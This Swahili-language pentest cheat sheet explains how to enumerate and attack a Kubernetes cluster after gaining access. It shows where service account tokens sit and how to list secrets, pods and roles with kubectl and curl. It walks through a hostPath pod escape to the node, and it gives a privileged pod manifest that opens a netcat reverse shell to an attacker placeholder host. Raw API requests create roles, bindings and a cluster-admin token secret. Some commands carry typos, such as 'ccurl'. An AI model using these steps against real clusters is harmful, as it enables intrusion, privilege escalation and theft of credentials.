# Kubernetes Enumeration

{{#include ../../banners/hacktricks-training.md}}

## Kubernetes Tokens

Ikiwa umepata ufikiaji wa mashine, mtumiaji anaweza kuwa na ufikiaji wa jukwaa la Kubernetes. Token kawaida hupatikana katika faili inayotajwa na **env var `KUBECONFIG`** au **ndani ya `~/.kube`**.

Katika folda hii unaweza kupata faili za usanidi zenye **tokens na usanidi wa kuungana na seva ya API**. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.

Ikiwa umepata pod ndani ya mazingira ya kubernetes, kuna maeneo mengine ambapo unaweza kupata tokens na taarifa kuhusu mazingira ya K8 ya sasa:

### Service Account Tokens

Kabla ya kuendelea, ikiwa hujui ni nini huduma katika Kubernetes ningependekeza **ufuate kiungo hiki na usome angalau taarifa kuhusu usanifu wa Kubernetes.**

Imechukuliwa kutoka kwa [nyaraka za Kubernetes](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):

_“Unapounda pod, ikiwa hujaeleza akaunti ya huduma, inatolewa kiotomatiki akaunti ya huduma_ default _katika namespace hiyo hiyo.”_

**ServiceAccount** ni kitu kinachosimamiwa na Kubernetes na kinatumika kutoa kitambulisho kwa michakato inayofanyika katika pod.\
Kila akaunti ya huduma ina siri inayohusiana nayo na siri hii ina bearer token. Hii ni JSON Web Token (JWT), njia ya kuwakilisha madai kwa usalama kati ya pande mbili.

Kawaida **moja** ya directories:

- `/run/secrets/kubernetes.io/serviceaccount`
- `/var/run/secrets/kubernetes.io/serviceaccount`
- `/secrets/kubernetes.io/serviceaccount`

zina faili:

- **ca.crt**: Ni cheti cha ca kuangalia mawasiliano ya kubernetes
- **namespace**: Inaonyesha namespace ya sasa
- **token**: Inabeba **service token** ya pod ya sasa.

Sasa kwamba una token, unaweza kupata seva ya API ndani ya variable ya mazingira **`KUBECONFIG`**. Kwa maelezo zaidi endesha `(env | set) | grep -i "kuber|kube`**`"`**

Token ya akaunti ya huduma inasainiwa na funguo iliyoko katika faili **sa.key** na kuthibitishwa na **sa.pub**.

Mahali pa kawaida kwenye **Kubernetes**:

- /etc/kubernetes/pki

Mahali pa kawaida kwenye **Minikube**:

- /var/lib/localkube/certs

### Hot Pods

_**Hot pods ni**_ pods zinazobeba token ya akaunti ya huduma yenye mamlaka. Token ya akaunti ya huduma yenye mamlaka ni token ambayo ina ruhusa ya kufanya kazi zenye mamlaka kama vile kuorodhesha siri, kuunda pods, n.k.

## RBAC

Ikiwa hujui ni nini **RBAC**, **soma sehemu hii**.

## GUI Applications

- **k9s**: GUI inayoorodhesha klasta ya kubernetes kutoka kwa terminal. Angalia amri katika [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Andika `:namespace` na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
- **k8slens**: Inatoa siku chache za majaribio bure: [https://k8slens.dev/](https://k8slens.dev/)

## Enumeration CheatSheet

Ili kuorodhesha mazingira ya K8s unahitaji kadhaa ya haya:

- **token halali ya uthibitishaji**. Katika sehemu iliyopita tuliona wapi pa kutafuta token ya mtumiaji na token ya akaunti ya huduma.
- **anwani (**_**https://host:port**_**) ya API ya Kubernetes**. Hii inaweza kupatikana kawaida katika variables za mazingira na/au katika faili ya kube config.
- **Hiari**: **ca.crt ili kuthibitisha seva ya API**. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha seva ya API, lakini ukitumia `--insecure-skip-tls-verify` na `kubectl` au `-k` na `curl` hutahitaji hii.

Kwa maelezo hayo unaweza **kuorodhesha kubernetes**. Ikiwa **API** kwa sababu fulani inapatikana kupitia **Mtandao**, unaweza tu kupakua taarifa hiyo na kuorodhesha jukwaa kutoka kwa mwenyeji wako.

Hata hivyo, kawaida **seva ya API iko ndani ya mtandao wa ndani**, kwa hivyo utahitaji **kuunda tunnel** kupitia mashine iliyovunjika ili kuweza kuifikia kutoka kwa mashine yako, au unaweza **kupakia** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, au tumia **`curl/wget/chochote`** kufanya maombi ya HTTP ya moja kwa moja kwa seva ya API.

### Differences between `list` and `get` verbs

Kwa **`get`** ruhusa unaweza kupata taarifa za mali maalum (_`describe` chaguo katika `kubectl`_) API:
```
GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}
```
Ikiwa una ruhusa ya **`list`**, unaruhusiwa kutekeleza maombi ya API ili orodhesha aina ya mali (_`get` chaguo katika `kubectl`_):
```bash
#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments
```
Ikiwa una ruhusa ya **`watch`**, unaruhusiwa kutekeleza maombi ya API ili kufuatilia mali:
```
GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
GET /apis/apps/v1/watch/deployments  [DEPRECATED]
```
Wanafungua muunganisho wa mtiririko ambao unakurudishia orodha kamili ya Deployment kila wakati inabadilika (au wakati mpya inaundwa).

> [!CAUTION]
> Amri zifuatazo za `kubectl` zinaonyesha jinsi ya kuorodhesha vitu. Ikiwa unataka kufikia data unahitaji kutumia `describe` badala ya `get`

### Kutumia curl

Kutoka ndani ya pod unaweza kutumia vigezo kadhaa vya mazingira:
```bash
export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve this.
```
> [!WARNING]
> Kwa default, pod inaweza **kufikia** **kube-api server** katika jina la domain **`kubernetes.default.svc`** na unaweza kuona mtandao wa kube katika **`/etc/resolv.config`** kwani hapa utaona anwani ya seva ya DNS ya kubernetes (".1" ya safu hiyo ni kiunganishi cha kube-api).

### Kutumia kubectl

Kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:

Kwa default, APISERVER inawasiliana na muundo wa `https://`
```bash
alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces
```
> ikiwa hakuna `https://` katika url, unaweza kupata Hitilafu Kama Ombi Mbaya.

Unaweza kupata [**cheatsheet rasmi ya kubectl hapa**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio chaguzi tofauti za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji nayo.

Ili kupata ombi la HTTP ambalo `kubectl` inatuma unaweza kutumia parameter `-v=8`

#### MitM kubectl - Proxyfying kubectl
```bash
# Launch burp
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true
```
### Mipangilio ya Sasa

{{#tabs }}
{{#tab name="Kubectl" }}
```bash
kubectl config get-users
kubectl config get-contexts
kubectl config get-clusters
kubectl config current-context

# Change namespace
kubectl config set-context --current --namespace=<namespace>
```
{{#endtab }}
{{#endtabs }}

Ikiwa umeweza kuiba akauti za watumiaji, unaweza **kuziunda kwa ndani** ukitumia kitu kama:
```bash
kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )
```
### Pata Rasilimali Zinazoungwa Mkono

Kwa habari hii utajua huduma zote unazoweza kuorodhesha

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace
```
{{#endtab }}
{{#endtabs }}

### Pata Haki za Sasa

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace

# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
```
{{#endtab }}
{{#endtabs }}

Njia nyingine ya kuangalia haki zako ni kutumia chombo: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*

Unaweza kujifunza zaidi kuhusu **Kubernetes RBAC** katika:

{{#ref}}
kubernetes-role-based-access-control-rbac.md
{{#endref}}

**Mara tu unavyojua ni haki gani** ulizonazo, angalia ukurasa ufuatao ili kubaini **kama unaweza kuzitumia vibaya** ili kupandisha haki:

{{#ref}}
abusing-roles-clusterroles-in-kubernetes/
{{#endref}}

### Pata Haki za Wengine

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get roles
k get clusterroles
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"
```
{{#endtab }}
{{#endtabs }}

### Pata majina ya maeneo

Kubernetes inasaidia **vikundi vingi vya virtual** vinavyoungwa mkono na kundi moja la kimwili. Vikundi hivi vya virtual vinaitwa **majina ya maeneo**.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get namespaces
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/
```
{{#endtab }}
{{#endtabs }}

### Pata siri

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get secrets -o yaml
k get secrets -o yaml -n custnamespace
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/

kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
```
{{#endtab }}
{{#endtabs }}

Ikiwa unaweza kusoma siri unaweza kutumia mistari ifuatayo kupata mamlaka yanayohusiana na kila token:
```bash
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```
### Pata Akaunti za Huduma

Kama ilivyojadiliwa mwanzoni mwa ukurasa huu **wakati pod inatekelezwa, akaunti ya huduma kwa kawaida inatolewa kwake**. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kuongeza mamlaka. 

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get serviceaccounts
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
```
{{#endtab }}
{{#endtabs }}

### Pata Maendeleo

Maendeleo yanaelezea **vipengele** ambavyo vinahitaji **kuendeshwa**.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get deployments
k get deployments -n custnamespace
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
```
{{#endtab }}
{{#endtabs }}

### Pata Pods

Pods ndizo **containers** halisi ambazo zitakuwa **zinaendesha**.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get pods
k get pods -n custnamespace
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
```
{{#endtab }}
{{#endtabs }}

### Pata Huduma

Kubernetes **huduma** zinatumika ku **onyesha huduma katika bandari na IP maalum** (ambayo itakuwa kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua mahali ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get services
k get services -n custnamespace
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/services/
```
{{#endtab }}
{{#endtabs }}

### Pata voz

Pata **voz zote zilizowekwa ndani ya klasta**.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get nodes
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/nodes/
```
{{#endtab }}
{{#endtabs }}

### Pata DaemonSets

**DaeamonSets** inaruhusu kuhakikisha kwamba **pod maalum inafanya kazi katika nodi zote** za klasta (au katika zile zilizochaguliwa). Ikiwa utafuta DaemonSet, pods zinazodhibitiwa nayo pia zitaondolewa.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get daemonsets
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
```
{{#endtab }}
{{#endtabs }}

### Pata cronjob

Cron jobs inaruhusu kupanga kutumia sintaksia kama crontab uzinduzi wa pod ambayo itatekeleza kitendo chochote.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get cronjobs
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
```
{{#endtab }}
{{#endtabs }}

### Pata configMap

configMap kila wakati ina habari nyingi na configfile ambazo zinatoa kwa programu zinazotumia kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/za nje.

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get configmaps # -n namespace
```
{{#endtab }}

{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
```
{{#endtab }}
{{#endtabs }}

### Pata Sera za Mtandao / Sera za Mtandao za Cilium

{{#tabs }}
{{#tab name="Tab ya Kwanza" }}
```bash
k get networkpolicies
k get CiliumNetworkPolicies
k get CiliumClusterwideNetworkPolicies
```
{{#endtab }}
{{#endtabs }}

### Pata Kila Kitu / Yote

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get all
```
{{#endtab }}
{{#endtabs }}

### **Pata rasilimali zote zinazodhibitiwa na helm**

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'
```
{{#endtab }}
{{#endtabs }}

### **Pata matumizi ya Pods**

{{#tabs }}
{{#tab name="kubectl" }}
```bash
k top pod --all-namespaces
```
{{#endtab }}
{{#endtabs }}

## Kuingiliana na klasta bila kutumia kubectl

Kwa kuwa mpango wa udhibiti wa Kubernetes unatoa API ya REST-ful, unaweza kuunda maombi ya HTTP kwa mikono na kuyatumia na zana nyingine, kama **curl** au **wget**.

### Kutoroka kutoka kwenye pod

Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, kubadilisha kwenda kwenye pod iliyoundwa na kisha chroot ndani ya mfumo wa node. Unaweza kutumia pods zilizopo kama rejea kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.
```bash
kubectl get pod <name> [-n <namespace>] -o yaml
```
> ikiwa unahitaji kuunda pod kwenye node maalum, unaweza kutumia amri ifuatayo kupata lebo kwenye node
>
> `k get nodes --show-labels`
>
> Kwa kawaida, kubernetes.io/hostname na node-role.kubernetes.io/master ni lebo nzuri za kuchagua.

Kisha unaunda faili yako ya attack.yaml
```yaml
apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
namespace: default
spec:
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: ubuntu
imagePullPolicy: Always
name: attacker-pod
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
#  kubernetes.io/hostname: master
# or using
#  node-role.kubernetes.io/master: ""
```
Baada ya hapo unaunda podi
```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```
Sasa unaweza kubadilisha kwenda kwenye pod iliyoundwa kama ifuatavyo
```bash
kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
```
Na hatimaye unachroot ndani ya mfumo wa node.
```bash
chroot /root /bin/bash
```
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)

### Kuunda pod yenye mamlaka

Faili la yaml linalolingana ni kama ifuatavyo:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: everything-allowed-exec-pod
labels:
app: pentest
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: everything-allowed-pod
image: alpine
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "nc <ATTACKER_IP> <ATTACKER_PORT> -e sh" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
volumes:
- name: noderoot
hostPath:
path: /
```
Tengeneza pod kwa kutumia curl:
```bash
CONTROL_PLANE_HOST=""
TOKEN=""

curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 478' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"labels\":{\"app\":\"pentest\"},\"name\":\"everything-allowed-exec-pod\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"nc <ATTACKER_IP> <ATTACKER_PORT> -e sh\"],\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"image\":\"alpine\",\"name\":\"everything-allowed-pod\",\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"hostIPC\":true,\"hostNetwork\":true,\"hostPID\":true,\"volumes\":[{\"hostPath\":{\"path\":\"/\"},\"name\":\"noderoot\"}]}}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa pod

Futa pod kwa kutumia curl:
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
POD_NAME="everything-allowed-exec-pod"

curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods/$POD_NAME"
```
### Unda Akaunti ya Huduma
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"


curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Length: 109' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"ServiceAccount\",\"metadata\":{\"name\":\"secrets-manager-sa-2\",\"namespace\":\"default\"}}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Akaunti ya Huduma
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
SA_NAME=""
NAMESPACE="default"

curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 35' -H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts/$SA_NAME"
```
### Unda Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"


curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'Accept: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 203' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"Role\",\"metadata\":{\"name\":\"secrets-manager-role\",\"namespace\":\"default\"},\"rules\":[{\"apiGroups\":[\"\"],\"resources\":[\"secrets\"],\"verbs\":[\"get\",\"create\"]}]}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_NAME=""

curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles/$ROLE_NAME"
```
### Unda Kifungo cha Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"

curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 816' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"RoleBinding\",\"metadata\":{\"name\":\"secrets-manager-role-binding\",\"namespace\":\"default\"},\"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"Role\",\"name\":\"secrets-manager-role\"},\"subjects\":[{\"apiGroup\":\"\",\"kind\":\"ServiceAccount\",\"name\":\"secrets-manager-sa\",\"namespace\":\"default\"}]}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/$NAMESPACE/default/rolebindings?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Mkataba wa Jukumu
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
ROLE_BINDING_NAME=""

curl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
```
### Futa Siri
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"

curl --path-as-is -i -s -k -X $'POST' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Accept: application/json' \
-H $'Content-Type: application/json' \
-H $'Content-Length: 219' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/$NAMESPACE/default/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
```
### Futa Siri
```bash
CONTROL_PLANE_HOST=""
TOKEN=""
NAMESPACE="default"
SECRET_NAME=""

ccurl --path-as-is -i -s -k -X $'DELETE' \
-H "Host: $CONTROL_PLANE_HOST" \
-H "Authorization: Bearer $TOKEN" \
-H $'Content-Type: application/json' \
-H $'Accept: application/json' \
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
-H $'Content-Length: 35' \
-H $'Accept-Encoding: gzip, deflate, br' \
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
```
## Marejeleo

{{#ref}}
https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3
{{#endref}}

{{#include ../../banners/hacktricks-training.md}}